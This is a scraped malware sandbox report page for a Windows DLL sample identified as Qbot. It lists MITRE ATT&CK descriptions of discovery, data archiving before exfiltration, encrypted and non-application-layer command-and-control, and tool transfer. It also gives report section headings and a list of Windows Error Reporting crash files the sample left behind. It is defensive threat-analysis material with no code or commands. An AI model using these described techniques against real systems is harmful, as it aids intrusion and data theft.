Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report F086.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Qbot

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_92f46c7f299346a6ffcb64477668158ac3e1de1_82810a17_115c31ef\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_92f46c7f299346a6ffcb64477668158ac3e1de1_82810a17_1bf84170\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_e81cd1d5139fff9fe89f63caf8b194b6696e72da_82810a17_0aac24e0\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_e81cd1d5139fff9fe89f63caf8b194b6696e72da_82810a17_16cc24ef\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_e81cd1d5139fff9fe89f63caf8b194b6696e72da_82810a17_1b044132\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1714.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1763.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1909.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1929.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1939.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1959.tmp.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2C42.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D9B.tmp.WERInternalMetadata.xml

Windows Analysis Report
F086.dll